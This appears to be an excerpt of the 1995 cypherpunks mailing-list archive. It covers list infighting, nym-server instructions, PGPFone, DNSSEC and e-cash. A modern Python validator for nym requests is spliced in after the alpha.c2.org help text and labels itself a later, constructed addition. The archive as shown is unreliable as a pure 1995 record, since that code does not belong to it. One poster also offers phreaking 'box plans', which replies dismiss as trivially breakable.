and how many bits of toe lint they found last week.

What we used to have was the cafe where the politically motivated
cryptographers hung out and gossiped. Now we have an open sewer in
which the occasional pearl still floats, and the cryptographers are
mostly gone.

Those of us who want to discuss cryptography here have been displaced.
If your goal is to impede communication about cryptography, you've
admirably succeeded. You've cut off one more place where people were
discussing how to deploy real-world solutions.

Tim May is wrong. I don't care what you call a "cypherpunk" -- that's
your business. However, the useful people *are* the people who write
code, spend long hours working to get standards implemented, work
lobbying in Congress, etc. Those of you who just rant, like Tim, were
very useful two years ago, but it's getting rather thin listening to
you guys make it impossible to discuss real work while you blather.
(Sorry, Tim. However, as long as you are going to call me "abusive" I
might as well speak my mind. If you are going to do the time, might as
well do the crime.)

> The Foster story concerns the chief NSA privacy-invasion of modern
> times: spying on domestic banking transactions.  So it's relevant.

Actually, what you've been posting has been even below the standards
of journalistic integrity (i.e. few) that you find on a Pacifica radio
station.

I don't even care if all the conspiracies are real. Isn't what is out
in the open enough? If the invasions of privacy that the government
acknowledges and the crap like Clipper that they try to foist on us
isn't horrifying enough, what weak-assed conspiracy theory that
someone came up with while tripping is going to do it for you.
Reality is frightening enough. FINCEN is real. The NSA really spied on
people at least until the congressional hearings in the '70s. The
government really invades privacy every day. Why do I need crap?

> 	The Grand Inquisitor role is getting a little old.  So if
> you want to continue to play it, my response is:  Fuck Off.
>
> -Orlin

Frankly, Orlin, I think you are, with respect to the goals we are
trying to advance here, a useless lump of flesh. I've spent about
$50,000 of my own money trying to make the internet safe for
root-eaters like yourself. I've spent months of my life struggling to
get RFCs out, and I'm spending most of this month locked in my
apartment writing code. Right now, we are coordinating an effort to
try to get IPSEC widely implemented in the next several months and
deployed by spring. What do you do, exactly, other than generate chaff
to make it impossible for any real work to be seen on the radar?

When people bring up real work, like cryptographic libraries or Wei's
stuff or the work I've been doing in the IETF and that sort of thing
people like Matt Blaze notice, and maybe Ray Cromwell and Hal Finney
(cypherpunks both, not ciphergroupies) try to discuss things, but the
folks like you basically drown everything out by making more noise
about random conspiracy garbage.

Frankly, if anyone is helping the NSA, it's you. They don't want to see
universally deployed crypto. You could be out trying to spread
cryptography by coding, by handing people crypto when they need it, or
any one of dozens of other things. Instead, what you are doing is
making it impossible for people to try to get work done.

I have no idea what you are like personally. Maybe you're a nice,
smart guy. Maybe you are really a useful person in your other life.
However, I don't think your posting more conspiracy tracts is
improving life as we know it.  You have become an impediment -- a lump
of rock in the highway. You aren't part of the solution -- you are
part of the problem.

Perry
----------------end Perry E. Metzger "Ciphergroupie" post --------------

                                         PUSH EM BACK! PUSH EM BACK!
                                         WWWAAAYYYY  BBBAAACCCK!
                                         BBBEEEAAATTTT  STATE!

                                         Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Aug 95 04:42:56 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: EU Data Protection
In-Reply-To: <ac51018d04021004d19c@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950812074013.336B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 11 Aug 1995, Timothy C. May wrote:

> Think about it: the name "data privacy" sounds good, at first blush, but
> what it really means is that my records are not private, that my records
> are inspectable by government agents to see if I have stored any illegal
> facts or correlations.
> 

In addition to registering records and making all records "public 
records" in some sense, data protection acts also require the registration 
of *computers.*

DCF

"Register commies not computers."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 12 Aug 95 04:58:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Nym server development....
Message-ID: <9508121158.AA20379@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


This seems as good a time as any to forward the full text of this to the
list. At worst, Alpha is a solid proof-of-concept of a possible "nym server"
model. IMHO it's actually much better than that.

I strongly recommend reading the below before asking basic questions about 
the workings of Alpha....

-Futplex <futplex@pseudonym.com>

Forwarded message:
> Date: Sat, 12 Aug 1995 04:41:01 -0700
> X-Last-Updated-Date: Jan 9 1995
> From: help@alpha.c2.org (Automated reply)
> Subject: Info on anonymous account service @alpha.c2.org
> Reply-To: admin@alpha.c2.org
> 
> This mail message was sent automatically in response to the message you
> sent to help@alpha.c2.org
> 
> This system allows you to create a pseudonymous address of the format
> username@alpha.c2.org.  For security, all messages are encrypted with PGP.
> 
> To create a mail alias, first create an encrypted reply-block for a
> cypherpunk-style remailer.  An encrypted reply block is a message
> encrypted with a remailer's PGP public key, which will be sent to
> your address, or to an address where you can receive messages.
> 
> To create a reply block, you would create a message for a remailer that
> goes back to you:
> 
>  ::
>  Request-Remailing-To: you@yoursite.org
> 
> Then you would encrypt that with a remailer's public key, and prepend
> the necessary Encrypted: PGP header.  When this message is received by
> a remailer, it would decrypt it and send it to you.  It would also send
> you any text appended to the end (outside the PGP wrapper).  Thus, using
> a reply block, it is possible for people to send you mail without knowing
> your real address.
> 
> Next, choose a pseudonym and a password.  The pseudonym-address may contain
> any alphabetical or numeric characters, or hyphens.  The password may not
> contain any spaces.  Then create a message of the following format:
> 
>  From: yourname@alpha.c2.org
>  New-Password: Your_Password
>  Reply-Block:
>  ::
>  Anon-To: remailer@xs4all.nl
> 
>  ::
>  Encrypted: PGP
> 
>  -----BEGIN PGP MESSAGE-----
>  Version: 2.3a
> 
>  hIwC/nqSW1QDQfUBBACknZMV93wFS2CH0orlgslmEm+alhjI1eKwbbTTmeRWC5Rg
>  /S3vZw+95ZuCZfqxKE0XrgZXzOEwfoyBcpVvf9Pb9D19TqEMTmmL/Jpl1xcxmbJ2
>  OGsHpQ/TxpazBCVhdBmPblj5wWvwfG1+ZKpIkQ5hiLJhryQM/TUDarEscs3zdaYA
>  AAB5231aMcQ74AKoDZizABMF3Tw+olV4mm4jVo9cMn2B3Rj2XBFl4pV9VL3h0ZQB
>  cPY/ytBRyZPugr0NpLgjO+q6mEjCcgQrxpYQ+1PvFPdDx1GmJ5ogZqW+AVHsNqAp
>  vRoiG8ZhXs4r3E8liFsNtMMf6CUAsdV2ZoX1Hw==
>  =Bla3
>  -----END PGP MESSAGE-----
> 
> Do not actually indent it; that's just for example purposes.
> Encrypt this with the following public key and mail it to
> alias@alpha.c2.org.  Unencrypted mail sent to this address
> will be deleted automatically.  If everything is correct, your
> mail alias will be created, and you will be sent a confirmation.
> If not, there will be no way for the software to reply to you,
> so the message will be deleted.  If you don't receive anything,
> something is wrong, so try again.  Be sure to test the reply
> block first, so that you will know it works!  Also, don't forget
> to include the address of the remailer, and the Encrypted: PGP
> header at the beginning of your reply block.
> 
> Here is the public key:
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6
> 
> mQCNAi7K8rQAAAEEAMiK09Nd+NfaL4Q14bKT0Ivdj3MdbCjAG6Cs5ULYBS1ZWSLA
> KiHsm0+kPNHqBVOufN7FT2iK0Mbuyk+dZgHG6ScicDkImysRkmso7eh5c9mU9V8K
> M0+ImKJyOwgVLEgyRK5e4h2XHpwSTtpx3zZpk4CsexLGCQNXF+ikm236U0rNAAUR
> tCpQc2V1ZG9ueW1vdXMgUmVtYWlsZXIgPGFsaWFzQGFscGhhLmMyLm9yZz4=
> =xmQf
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 
> When mail comes in for your address at alpha.c2.org, it will be
> encrypted with Your_Password, using pgp -cta, appended to the reply
> block and sent to remailer@alpha.c2.org.  Be sure that you have
> the Encrypted: PGP header, and the address of the next remailer
> it is to be sent to!  All messages are held and sent out in random
> order once an hour.
> 
> If you later wish to change your password, send an encrypted message to
> alias@alpha.c2.org containing a From: line with your nickname, a
> Password: line with your current password, and a New-Password: line
> containing your new password.  If the old password is correct, the
> password will be changed to the new one.  For example:
> 
>  From: Dan_Quayle
>  Password: Bush
>  New-Password: Clinton
> 
> You can also include a new Reply-Block.
> 
> A mail alias can be deleted at any time by setting the password to nothing.
> (Send a password change request with nothing following the 'New-Password:')
> 
> 
> Sending messages
> 
> Once you have created a working address, you can send mail from that address.
> Simply create a message with standard mail headers, and add your password
> in a Password header.
> 
>  From: jdoe@alpha.c2.org (John Doe)
>  Password: foobar
>  To: alt.anonymous@demon.co.uk
>  Subject: hello world
> 
>  This is my message.
> 
> The message would be delivered as shown, minus the Password: header.
> If the password is not correct, the message is discarded.
> 
> 
> Troubleshooting
> 
> Here are some common problems.  If you're having trouble, check the
> following list:
> 
>  - Be sure to use -t option with PGP
>  - Test your reply block and be sure it works!
>  - If you are having trouble creating a certain address, perhaps
>    you already created it, but used the wrong reply block
>    or a different password.
>  - Usenet posts require a Subject: header.
>  - Messages to alias@alpha.c2.org must be encrypted with PGP
>    Be sure you use the correct PGP key; remailer@alpha.c2.org
>    has a different one.
> 
> 
> Problems may be reported to admin@alpha.c2.org
> 
> For more information about Community ConneXion,
>  telnet to c2.org and login as guest, or if you have a WWW browser:
>  http://www.c2.org/
> 
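
A pre-flight check for the alias-creation request described in the help text above, added here as an example; it is not alpha.c2.org's code, and the function names and sample request are constructed. It runs on the plaintext request before that is encrypted to the alias@alpha.c2.org key, because the help text says a malformed request is deleted with no reply.

```python
import base64
import re

# Rules below are taken from the alpha.c2.org help text quoted above.
NYM_RE = re.compile(r"^[A-Za-z0-9-]+$")          # letters, digits, hyphens
HOP_HEADERS = ("anon-to", "request-remailing-to")  # both appear in the help text
ARMOR_BEGIN = "-----BEGIN PGP MESSAGE-----"
ARMOR_END = "-----END PGP MESSAGE-----"


def split_request(text):
    """Split a plaintext request into (headers, reply_block_lines)."""
    headers, block = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if block is not None:
            block.append(line)                    # everything after Reply-Block:
        elif line.lower().startswith("reply-block:"):
            block = []
        elif ":" in line and not line.startswith(":"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return headers, block or []


def check_creation_request(text):
    """Return a list of problems; an empty list means these checks pass."""
    problems = []
    # "Do not actually indent it; that's just for example purposes."
    if any(l[:1] in (" ", "\t") for l in text.splitlines() if l.strip()):
        problems.append("lines are indented; the indent in the help text is display only")

    headers, block = split_request(text)
    sender = headers.get("from", "").split(" ")[0]
    nym, _, domain = sender.partition("@")
    if not NYM_RE.match(nym):
        problems.append("pseudonym may contain only letters, digits and hyphens")
    if domain.lower() != "alpha.c2.org":
        problems.append("From: must be <pseudonym>@alpha.c2.org")

    password = headers.get("new-password")
    if not password:
        problems.append("New-Password: is missing or empty")
    elif re.search(r"\s", password):
        problems.append("password may not contain spaces")

    nonblank = [l for l in block if l]

    def index_of(item, start=0):
        try:
            return nonblank.index(item, start)
        except ValueError:
            return -1

    # First hop: '::' followed by the address of the remailer.
    hop_name, _, hop_addr = (nonblank[1] if len(nonblank) > 1 else "").partition(":")
    if nonblank[:1] != ["::"] or hop_name.lower() not in HOP_HEADERS or "@" not in hop_addr:
        problems.append("reply block must open with '::' and the remailer's address")

    # Second header pair: '::' then 'Encrypted: PGP', ahead of the armored message.
    enc = index_of("Encrypted: PGP")
    if enc < 1 or nonblank[enc - 1] != "::":
        problems.append("reply block lacks the '::' / 'Encrypted: PGP' header pair")

    begin = index_of(ARMOR_BEGIN)
    end = index_of(ARMOR_END, begin + 1) if begin >= 0 else -1
    if begin < 0 or end < 0 or end - begin < 2:
        problems.append("reply block lacks a complete PGP MESSAGE armor block")
    elif enc > begin:
        problems.append("'Encrypted: PGP' must come before the PGP message")
    return problems


# Constructed sample: the armor body is a labelled placeholder, not ciphertext.
PLACEHOLDER = base64.b64encode(b"constructed placeholder, not real ciphertext").decode()
GOOD = "\n".join([
    "From: example-nym@alpha.c2.org",
    "New-Password: Correct-Horse-1",
    "Reply-Block:",
    "::",
    "Anon-To: remailer@xs4all.nl",
    "",
    "::",
    "Encrypted: PGP",
    "",
    ARMOR_BEGIN,
    "Version: 2.3a",
    "",
    PLACEHOLDER,
    ARMOR_END,
])

if __name__ == "__main__":
    for label, request in [("good", GOOD),
                           ("bad nym and password",
                            GOOD.replace("example-nym", "bad_nym")
                                .replace("Correct-Horse-1", "two words"))]:
        print(label, "->", check_creation_request(request) or "ok")
```

Passing these checks does not show that the reply block routes back to you; the help text's advice to test the reply block first still applies.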



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 12 Aug 95 05:35:08 PDT
To: trei@process.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <9508111351.AA04381@toad.com>
Message-ID: <199508121234.IAA03887@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> Don Eastlake has actually done a draft RFC on
> using the DNS for key distribution.

It's more than a draft -- at this point it is very clearly standards
track. Note that the document in question only covers security for the
DNS itself, but the side effect is that you've built all the
mechanisms you need for general key distribution. Don is now working
on the certificate formats.

> It may be found at 
> 
> ftp://ietf.cnri.reston.va.us/internet-drafts/draft-ietf-dnssec-secext-04.txt
> 
> He briefed the W3C security working group about
> this recently, and a number of people raised objections, notably
> 
> * database bloat
> * zone transfer bloat
> * increased hits on root servers due to a new class of inquiry.

As I've noted, given the actual in-field experience of Hesiod, I'm not
in the least worried.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 06:23:03 PDT
To: cypherpunks@toad.com
Subject: YOM_ama
Message-ID: <199508121322.JAA13154@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. Sunday NYPaper:


   "Bigger Than the Family, Smaller Than the State: Are
   voluntary groups what make countries work?" [Book review]

      Mr. Fukuyama has shifted his attention from the state to
      society; the result is a fascinating and frustrating
      book, "Trust: The Social Virtues and the Creation of
      Prosperity." We have settled on the structure of the
      state, he writes, but "liberal political and economic
      institutions depend on a healthy and dynamic civil
      society for their vitality."

      In the world of ideas, civil society is hot. It is
      almost impossible to read an article on foreign or
      domestic politics without coming across some mention of
      the concept. And "civil society" has bipartisan appeal;
      from Hillary Rodham Clinton to Pat Buchanan, politicians
      of all stripes routinely sing its praises.

      Behind much of the new interest in civil society, on the
      part of communitarians as well as social conservatives,
      is the idea that culture and society shape the nature of
      government. But the space between the realm of
      government and that of the family can be filled with all
      kinds of associations, liberal and illiberal. Historians
      have amply laid out how the Nazi Party made its first
      inroads through infiltrating local groups. On a less
      extreme note, many of the small groups that have formed
      in America over the last two decades have been
      thoroughly illiberal in spirit: victims' groups that
      have discouraged individual responsibility, minority
      clubs that have Balkanized the campus and the workplace,
      pseudoreligious cults with violent agendas. Not all of
      civil society is civic minded.

      A report on Timothy J. McVeigh's civil life noted that
      Mr. McVeigh and Terry and James Nichols, would go
      bowling and plan their future. But perhaps we would all
      have been better off if Mr. McVeigh had gone bowling
      alone.


   YOM_ama (about 14K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 12 Aug 95 09:42:30 PDT
To: cypherpunks@toad.com
Subject: Significance of PGPFone?
Message-ID: <ac522139000210046274@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Steve Bryan asks about the potential significance of the new PGPFone:

At 8:59 PM 8/11/95, Steve Bryan wrote:

>Am I the one of the few who thinks that PGPFone is the biggest CypherPunk
>event for years? I think it will be even more significant if we get strong
>encryption

Hard to say how significant it is. Some points:

* Nautilus has been out for a while....after a splash of publicity when it
appeared, not much has been heard recently.

* E-mail and the Net are fundamentally different from voice communication.
Encrypting or signing messages in text form is different from encrypting
voice communications between two parties. (The eventual large use of
encryption is likely to be driven by digital payment schemes, proof of
signed contracts, etc. In other words, non-voice applications.)

* Wiretapping of voice communications is fundamentally a different sort of
problem than intercepting cleartext of e-mail and Net interactions. This
is a point Whit Diffie makes cogently, that it's much easier for
packet-sniffers to automate surveillance at the touch of a key than it is
to order audio lines to be tapped. (Quibblers may cite increasing
automation, causing some convergence, but the point remains that voice
conversations must still be recorded, listened to, etc., whereas computer
text messages may be more easily analyzed.)

* Most of my voice communications are with nearby folks, for various
reasons, and I doubt I'll be rushing to encrypt them anytime soon (or
expect the other party to).

* The versions of PGPFone, Nautilus, etc., that run on the Internet (as
opposed to modem-to-modem phone calls) will be extremely interesting
because of the pricing structure..."free" phone calls anywhere. (Some
people are doing this already, of course, and the telcos are starting to
notice.)

* I have a Macintosh, so I'm planning to get it and try it out. This may
change my views of things. But, to be honest, I'm fearful of the "when you
have a hammer, everything looks like a nail" syndrome: that when I find
someone else who has PGPFone I'll find reasons to call them just to test
the functioning. Needless to say, this is not reason enough to keep on
using it.

* Anecdotally, most people I know who have "secure phones" use them only
occasionally. Several people have said variants of "I only used it to test
it to see if it was working." It's not obvious to me that things will be
much different with even more casual users such as most of us are.

* It is a fact that the people most motivated to use crypto are the ones
with the most to fear from an anticipated threat. Thus, Pablo Escobar's
"crew" will likely deploy such tools, where Joe Suburban probably won't.

(The arguments sometimes made, that Mafiosos and Colombian drug cartels are
"too stupid" to use crypto are vitiated by the ease-of-use which these new
crypto tools are designed to have....also, corner drug dealers who some
might think to be illiterate are typically the earliest adopters of
cellular phones, pocket pagers, and whatnot.)

(Don't flame me for stating the obvious. I'm not advocating restrictions on
crypto, or invoking the Four Horsemen of the Infocalypse.)

* Finally, I have a "fax modem" on my Macintosh, as many of you do. Guess
what? I went and got a real fax machine. Lots of reasons. First, my fax
modem had to be installed just right...if inits or preferences got subtly
shifted, it stopped working properly. Second, sending things was a bitch.
(Had to have the scanner up and working, which was not often, etc.) Third,
robustness.

This is relevant to the cryptophone issue because many folks believe only
the "bump in the cord" model--where the crypto module is just a bump in the
phone cord--will work for most people. Most users will not have their 486 +
SoundBlaster + other stuff set up and working for routine phone calls.
(Configurations changing, various OSes, etc.)

(The Internet versions make it more advantageous to use one's computer, so
I have more hope for them than I do for modem-to-modem versions.
Incorporating a voice communication module into other
programs--telnet?--might be an idea. And Java and HotJava fit in
somehow....)

So, I hope to get PGPFone when it appears, but I'm not convinced it'll be
the biggest revolution imaginable.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 12 Aug 95 09:56:20 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <ac522afb01021004ad76@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 AM 8/12/95, Sauroth wrote:
>Actually quite a few hackers/phreaks have been encrypting phone
>conversations for a while.  Not by any complex mathematics but
>simple modifications to the phone frequencies...Don't have any
>sites handy but for those interested I'll look up some of my old
>material.  I'll also check a large compendium of boxes to see if
>Purple has been designated.  Anyone interested in box plans of
>different colors e-mail me.

And the  "simple modifications to the phone frequencies" points to why such
things are not "strong crypto."

At best, security through obscurity. At worst, self delusion.

It gets back to the threat model. If the threat model is interception by
the neighborhood kids, then schemes for frequency-hopping, scrambling,
"warbling," and PhasorPhone-like diddling are OK. If the threat model is
the local police department tapping one's phone, probably not enough, as
they likely can gain access to the E-Systems DigiTrac 6700 and trivially
unscramble the signal.

Long term, only robust, strong crypto works (Michael Handler's "civil
liberties through complex mathematics").

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 12 Aug 95 10:34:29 PDT
To: cypherpunks@toad.com
Subject: Stupid XOR Question
Message-ID: <199508121705.KAA23345@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


ok dumb questions here.........

how do i xor a simple string of plaintext?

I am running linux 1.2.4







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 12 Aug 95 07:05:54 PDT
To: cypherpunks@toad.com
Subject: e$: Reuters Smells the Coffee
Message-ID: <v02120d03ac526025ff8b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Sat, 12 Aug 1995 00:01:58
From: infocker@megaweb.com
Sender: infocker@megaweb.com () (from unknown.aol.com 205.188.2.111)
To: www-buyinfo@allegra.att.com
Subject: Cyber Economy--Govts. Cannot Control

Thought Mr. Hettinga might particularly appreciate this perspective.

Jim Rapp
Alexandria, Virginia
"give me more info"

As always, do not send the copyright police after me.


LONDON - Growing business on the Internet computer network could
allow companies and individuals to avoid taxes and build up a black
economy increasingly out of range of government intervention and
regulation, computer experts say.

People will be able to download computer programs from
Philadelphia to Paris or buy books from Madrid in Manila, avoiding
export or import duties and sales taxes, as well as bypassing
government trade statistics.

"Electronic purses," loaded from banks down telephone lines,
could become the favored means of payment for fast, anonymous and
secure payments, with currencies of choice becoming more exotic,
depending on what is acceptable to dealmakers.

"Cyberdollars," expatriate U.S. currency zapping across telephone
lines between computers, could add to problems posed for authorities
by existing funds outside national borders.

Deals on the Internet are mainly completed by credit card at
present. But electronic purses could lead to a buildup of currency
beyond the control of governments and central banks, further limiting
their influence on economies and markets and making traditional
monetary tools like interest rates less effective.

"Online business will involve much more economic activity outside
the control and ambit of government," Madsen Pirie, director of the
Adam Smith Institute, a right-wing British think-tank, told Reuters.

"Government will have to limit its ambitions. Just like
governments in the modern world find it difficult to have exchange
control; they can't control billions of dollars of cash sloshing
around foreign exchange markets," he said.

Business is fairly modest now but will increase exponentially,
Pirie forecasts.

The U.S. Commerce Department has said electronic cash will
account for 20 percent of U.S. purchases by 2005, up from just over 4
percent last year and compared with just over 16 percent forecast by
2000.

Leaders of the information technology industry believe that the
embryonic stage is over and are wary of government action, which they
feel might inhibit growth.

Analysts reckon that any attempt to regulate cybermarkets is
likely to be futile.

The Adam Smith Institute's Pirie agrees, predicting: "Governments
will fail if they try to control this. They always have when they try
to hold back the way history is going."

- - - - -

Copyright, Reuters America Inc. All rights reserved
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an264373@anon.penet.fi (Sauroth)
Date: Sat, 12 Aug 95 03:19:08 PDT
To: cypherpunks@toad.com
Subject: Purple Boxes
Message-ID: <9508121008.AA10417@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> it would be called the "purple box" because I have not heard
> of any other devices called "purple boxes" (i.e. this string
> in the "colorful" hacker namespace does not seem to be used up yet)
> and also the famous WWII compromised Japanese diplomatic codes
> were called Purple.

Actually quite a few hackers/phreaks have been encrypting phone 
conversations for a while.  Not by any complex mathematics but 
simple modifications to the phone frequencies...Don't have any 
sites handy but for those interested I'll look up some of my old
material.  I'll also check a large compendium of boxes to see if
Purple has been designated.  Anyone interested in box plans of 
different colors e-mail me.

Sauroth


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 12 Aug 95 08:28:01 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Mix-L is now archived..
Message-ID: <Pine.BSD.3.91.950812102234.17497A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I added archiving to the mix-l mailing list on jpunix.com. All 
messages entered as of 08/12/95 will be available for archive. 
Additionally, the various information files for Mixmaster including the 
public keyring and the list of type 2 remailers are also available 
through Majordomo on jpunix.com.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 12 Aug 95 12:01:49 PDT
To: Tatjana vonBernhardi <unicorn@access.digex.net>
Subject: Re: Bank Fees and E-Cash
Message-ID: <199508121900.MAA19501@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:53 PM 8/11/95 -0400, Tatjana vonBernhardi wrote:
> you have surpassed yourself in assumption here.
>
> your hope that e-cash will some how reduce bank fees is a long stretch.

Eventually people will bypass the banks, directly transferring funds
to each other.  This will reduce the banks' fees to zero.  The
banks will gradually lose control of the indecently lucrative 
funds transfer business, and have to go to the bread and butter 
business of borrowing short and lending long, and evaluating 
credit worthiness, and providing guarantees of payment.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 12 Aug 95 10:16:21 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508121713.NAA14198@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508120857.BAA11361@ix5.ix.netcom.com>,
stewarts@ix.netcom.com (Bill Stewart) wrote:

>Yes, lots of us aren't using modems faster than 14400 now, but you can get a 
>14.4/19.2 modem at Fry's for well under $100.  (19.2 is unfortunately
>not quite enough to 16 kbps, given start and stop bits, unless you do
>synchronous
[...]
>Anybody who needs to avoid government or business-competitor eavesdroppers
>can probably
>afford $150 in extra hardware for their PC.
>
>This doesn't apply to international communications or folks in the boonies,
>where it's hard to get full performance out of modems, so you Commie
>spies and Earth First!ers will need more expensive high-tech equipment :-)...

Here is my usual plea to anyone designing a computer telephony
application that uses modems: please always include a low bandwidth codec!
I am on a brand new DMS-100 and have new lines running from the CO to my
house. I can still not go over 9600bps. My only alternative is ISDN, which
isn't just another $150, but $1000. Please give the user a choice of
codecs that allows for minimization of the requirements along _any_ of
the three axes of the performance cube.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCzhMCoZzwIn1bdtAQFKXAGAoS3CU0svmkGps3khnqS+tblUR5te9iV9
p6Ifw9jeQlkL0T7uA8W1DUWKE7M4s+O6
=o9A4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 12 Aug 95 10:21:39 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes
Message-ID: <199508121719.NAA14221@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9508121008.AA10417@anon.penet.fi>, an264373@anon.penet.fi
(Sauroth) wrote:

>Actually quite a few hackers/phreaks have been encrypting phone 
>conversations for a while.  Not by any complex mathematics but 
>simple modifications to the phone frequencies...Don't have any 
>sites handy but for those interested I'll look up some of my old
>material.

This is encryption of the type that, as Bruce Schneier would say, prevents
your little sister from listening in on your phone call. Trivial to break.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCziXSoZzwIn1bdtAQFLaQGA2e01U8TnIReKoNnq6UuUJsTvsfYK2tVk
f0By3gfne/eGlUJDPyIGXJ+tnuAKAilh
=N+fX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 12 Aug 95 10:30:21 PDT
Subject: Re: Still more "S-1" foolishness
In-Reply-To: <199508112206.SAA27354@crypto.com>
Message-ID: <199508121738.NAA05367@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:
>Here's a table of where the expanded key schedule bits come from
>(I think - this could be wrong, I had to tweak some of the output
>by hand).  Note that some key bytes are used much more often, and
>in more positions, than others, but every key byte does at least
>end up being used as input to each F eventually (but not always to
>each "target" byte).
>
>Sorry for the opaque notation; this reads best when used in conjunction
>with Colin's cool graph that he posted to sci.crypt last night.
>

Whoops - there was a bug in my understanding of what was going on
that conspired with a bug in my table generation program to make everything
wrong.  Here's the correct table, for those interested.  Sorry for the noise.

-matt


 R |    | G0   G1  F+0  F+1  F+2  F+3   (this key byte is input to this fn)
